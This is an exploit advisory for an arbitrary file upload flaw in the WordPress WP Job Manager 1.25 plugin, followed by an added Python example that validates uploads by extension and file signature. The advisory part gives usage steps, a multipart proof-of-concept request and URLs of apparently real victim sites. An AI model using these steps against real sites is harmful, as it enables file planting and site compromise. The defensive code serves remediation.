######################
# Exploit Title : Wordpress WP Job Manager 1.25 Arbitrary File Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork : go here https://cxsecurity.com/issue/WLB-2016070087 or http://0day.today/exploit/description/25667
# Software link : http://downloads.wordpress.org/plugin/wp-job-manager.latest-stable.zip
# Vendor Homepage : https://wpjobmanager.com/
# version : 1.25.0
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/11
# video Proof : https://youtu.be/nx-WtfdOkLc
######################
# [+] DESCRIPTION :
######################
# [+] WP Job Manager is a lightweight plugin for adding job-board functionality to your WordPress site.
# [+] An arbitrary file upload web vulnerability has been detected in the WP Job Manager 1.25 and below.
# [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory
######################
# [+] USAGE :
######################
# 1.- SELECT A WEBSITE FROM THE DORK ABOVE
# 2.- GO TO POST A JOB URL <HOST><WP-PATH>/post-a-job/ [or] Look for it
# 3.- Fill all the Fields No need to Register or Preview Then in Logo upload your FILE.jpg
# 4.- Using Tamper Data or HTTP LIVE Headers change your FILE.TXT OR PHP
# 5.- Go to url "http(s)://<wp-host>/<wp-path>/wp-content/uploads/job-manager-uploads/company_logo/<Year/month>/<your-file-name>"
######################
# [+] Poc :
######################
# -----------------------------18132430516394\r\n
# Content-Disposition: form-data; name="script"\r\n
# \r\n
# true\r\n
# -----------------------------18132430516394\r\n
# Content-Disposition: form-data; name="company_logo"; filename="x.txt"\r\n
# Content-Type: image/jpeg\r\n
# \r\n
######################
# [+] Test :
######################
# http://sala.sk.ca/wp-content/uploads/job-manager-uploads/company_logo//2016//07/xx.txt
# http://www.ruralhumanservices.org/wp-content/uploads/job-manager-uploads/company_logo/2016//07/xx.txt
######################
# [+] File Path :
######################
# http(s)://<wp-host>/<wp-path>/wp-content/uploads/job-manager-uploads/company_logo/2016//07/x.txt
######################
# [+] Live Demo :
######################
# http://www.ruralhumanservices.org/post-a-job/
# http://sala.sk.ca/post-a-job/
# http://www.elmundodeltransporte.com/publica-una-oferta-laboral
#
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################
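The description and PoC above show the defect at the protocol level: the server trusts the filename and the client-declared Content-Type of the company_logo part, so a text payload labelled image/jpeg is stored under the upload directory. The following is an added example, not code from the advisory or from the WP Job Manager project, showing the server-side check a maintainer would want instead: parse the multipart body, locate the company_logo part (field name taken from the PoC), and accept it only if the extension is on an image allowlist and the file's own leading bytes match that type, never consulting the declared Content-Type. The boundary value, the helper names and the sample bodies are assumptions constructed to mirror the PoC's shape.

```python
# Added example (not from the advisory): server-side validation of a multipart
# upload that ignores the client-supplied Content-Type and checks the file's
# own bytes against an extension allowlist. The multipart bodies below are
# constructed to mirror the advisory's PoC; the field name "company_logo" is
# taken from it, everything else (boundary value, helper names) is assumed.
import re

# The PoC's delimiter line is "--" followed by this boundary value (assumed).
BOUNDARY = b"---------------------------18132430516394"

# Allowed logo types, keyed by extension, with the leading bytes a real file
# of that type must start with.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def build_body(filename: str, declared_type: str, payload: bytes) -> bytes:
    """Build a multipart/form-data body shaped like the advisory's PoC."""
    delim = b"--" + BOUNDARY
    return (
        delim + b"\r\n"
        + b'Content-Disposition: form-data; name="script"\r\n\r\ntrue\r\n'
        + delim + b"\r\n"
        + f'Content-Disposition: form-data; name="company_logo"; filename="{filename}"\r\n'.encode()
        + f"Content-Type: {declared_type}\r\n\r\n".encode()
        + payload + b"\r\n"
        + delim + b"--\r\n"
    )


def parse_multipart(body: bytes, boundary: bytes) -> list:
    """Minimal multipart parser: returns [{'headers': {...}, 'data': bytes}]."""
    delim = b"--" + boundary
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter, nothing follows
            break
        chunk = chunk[2:]                    # drop the CRLF after the delimiter
        raw_headers, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in raw_headers.split(b"\r\n"):
            name, _, value = line.partition(b":")
            headers[name.strip().lower().decode()] = value.strip().decode()
        if data.endswith(b"\r\n"):           # CRLF that precedes the next delimiter
            data = data[:-2]
        parts.append({"headers": headers, "data": data})
    return parts


def validate_logo(part: dict) -> tuple:
    """Accept only allowlisted image extensions whose bytes match that type.
    The part's own Content-Type header is deliberately never consulted."""
    disposition = part["headers"].get("content-disposition", "")
    m = re.search(r'filename="([^"]*)"', disposition)
    if not m:
        return False, "missing filename"
    base = m.group(1).rsplit("/", 1)[-1].rsplit("\\", 1)[-1]   # strip any path
    name_parts = base.lower().split(".")
    if len(name_parts) != 2 or not name_parts[0]:
        return False, "filename must be name.ext with a single extension"
    ext = name_parts[1]
    if ext not in MAGIC:
        return False, f"extension .{ext} is not an allowed image type"
    if not part["data"].startswith(MAGIC[ext]):
        return False, f"content does not look like a .{ext} file"
    return True, "ok"


def check_upload(body: bytes) -> tuple:
    """Locate the company_logo part in a request body and validate it."""
    for part in parse_multipart(body, BOUNDARY):
        if 'name="company_logo"' in part["headers"].get("content-disposition", ""):
            return validate_logo(part)
    return False, "no company_logo part"


# Constructed sample requests: the PoC shape (text payload labelled image/jpeg),
# two variants, and a genuine JPEG header with a misleading declared type.
POC_BODY = build_body("x.txt", "image/jpeg", b"hello from a text file")
RENAMED_BODY = build_body("x.jpg", "image/jpeg", b"not an image at all")
DOUBLE_EXT_BODY = build_body("x.txt.jpg", "image/jpeg", b"\xff\xd8\xff\xe0JFIF")
REAL_JPEG_BODY = build_body("logo.jpg", "text/plain", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00")

if __name__ == "__main__":
    for label, body in [("PoC", POC_BODY), ("renamed", RENAMED_BODY),
                        ("double ext", DOUBLE_EXT_BODY), ("real jpeg", REAL_JPEG_BODY)]:
        print(label, check_upload(body))
```

Only the last sample is accepted: the PoC body fails on extension, a renamed text file fails the magic-byte check, and a double extension is refused outright, while the real JPEG passes even though the client declared text/plain. Content validation of this kind is one layer; the upload directory should also be served with script execution disabled so that a file which slips through is still only ever returned as static content.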